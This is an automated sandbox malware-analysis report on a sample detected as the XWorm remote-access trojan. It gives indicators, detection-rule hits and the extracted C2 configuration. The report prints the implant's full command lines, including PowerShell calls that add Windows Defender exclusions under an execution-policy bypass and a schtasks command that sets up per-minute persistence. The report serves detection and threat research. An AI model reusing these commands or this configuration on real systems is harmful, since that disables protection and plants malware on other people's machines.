Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
80c619d931fa4e5c89fe87aac0b6b143.exe

Overview

General Information

Sample name:80c619d931fa4e5c89fe87aac0b6b143.exe
Analysis ID:1508104
MD5:5957ab676b59da646ea6c4d1b18f4381
SHA1:c942211d7fe7371eced4269b707a846c7c4db3a7
SHA256:19aa0b7f9763b6905a2c22a19b6917cf40aa247af440949db580585722199d12
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 80c619d931fa4e5c89fe87aac0b6b143.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe" MD5: 5957AB676B59DA646EA6C4D1B18F4381)
    • RegSvcs.exe (PID: 4956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • powershell.exe (PID: 6668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4140 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\XClient.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 5608 cmdline: C:\Users\user\XClient.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 5544 cmdline: "C:\Users\user\XClient.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 6424 cmdline: "C:\Users\user\XClient.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 1576 cmdline: C:\Users\user\XClient.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 6160 cmdline: C:\Users\user\XClient.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 5912 cmdline: C:\Users\user\XClient.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 5532 cmdline: C:\Users\user\XClient.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["case-shield.gl.at.ply.gg"], "Port": "26501", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x5a5ea:$s6: VirtualBox
    • 0x5a548:$s8: Win32_ComputerSystem
    • 0x5ca65:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x5cb02:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x5cc17:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x5bcb7:$cnc4: POST / HTTP/1.1
    00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x18cc2:$s6: VirtualBox
        • 0x18c20:$s8: Win32_ComputerSystem
        • 0x1b13d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1b1da:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1b2ef:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1a38f:$cnc4: POST / HTTP/1.1
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            1.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xedda:$s6: VirtualBox
            • 0xed38:$s8: Win32_ComputerSystem
            • 0x11255:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x112f2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x11407:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x104a7:$cnc4: POST / HTTP/1.1
            0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                Click to see the 13 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 4956, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6668, ProcessName: powershell.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 4956, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6668, ProcessName: powershell.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4956, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 4956, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6668, ProcessName: powershell.exe
                Sigma detected: Startup Folder File Write
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4956, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 4956, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe', ProcessId: 6668, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:32:00.021865+020028531931Malware Command and Control Activity Detected192.168.2.549725147.185.221.1726501TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeAvira: detected
                Found malware configuration
                Source: 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["case-shield.gl.at.ply.gg"], "Port": "26501", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Multi AV Scanner detection for submitted file
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeReversingLabs: Detection: 34%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: case-shield.gl.at.ply.gg
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: 26501
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: <123456789>
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: <Xwormmm>
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: XWorm V5.6
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: USB.exe
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: %Userprofile%
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpackString decryptor: XClient.exe

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeUnpacked PE file: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.4c0000.0.unpack
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\US\source\repos\Mevlana\obj\Debug\Mevlana.pdb source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020842068.0000000004CA0000.00000004.08000000.00040000.00000000.sdmp, 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\US\source\repos\Mevlana\obj\Debug\Mevlana.pdbBSJB source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020842068.0000000004CA0000.00000004.08000000.00040000.00000000.sdmp, 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: XClient.exe, 0000000F.00000000.2242259727.0000000000242000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.1.dr
                Source: Binary string: RegSvcs.pdb source: XClient.exe, 0000000F.00000000.2242259727.0000000000242000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.1.dr

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49720 -> 147.185.221.17:26501
                Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49725 -> 147.185.221.17:26501
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: case-shield.gl.at.ply.gg
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 147.185.221.17 ports 26501,0,1,2,5,6
                Yara detected Generic Downloader
                Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.5:49713 -> 147.185.221.17:26501
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 147.185.221.17 147.185.221.17
                Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                Source: unknownDNS query: name: ip-api.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: case-shield.gl.at.ply.gg
                Source: powershell.exe, 00000006.00000002.2114526421.00000000076C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miF
                Source: powershell.exe, 00000006.00000002.2114526421.00000000076EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000006.00000002.2114526421.00000000076EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeString found in binary or memory: http://goo.gl/YroZm&quot;
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: powershell.exe, 00000003.00000002.2072568352.0000000005407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2110032456.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2153433564.0000000005FF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.2068390929.00000000044F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.00000000050E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: RegSvcs.exe, 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2068390929.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2068390929.00000000044F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.00000000050E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000006.00000002.2117008604.0000000008672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 00000006.00000002.2114526421.00000000076EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.C
                Source: powershell.exe, 0000000A.00000002.2219548874.0000000007736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000003.00000002.2068390929.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2099477887.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2138061383.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2189406554.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                Source: powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000A.00000002.2189406554.0000000004DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.2072568352.0000000005407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2110032456.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2153433564.0000000005FF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2212194876.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                Operating System Destruction

                barindex
                Protects its processes via BreakOnTermination flag
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6128.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
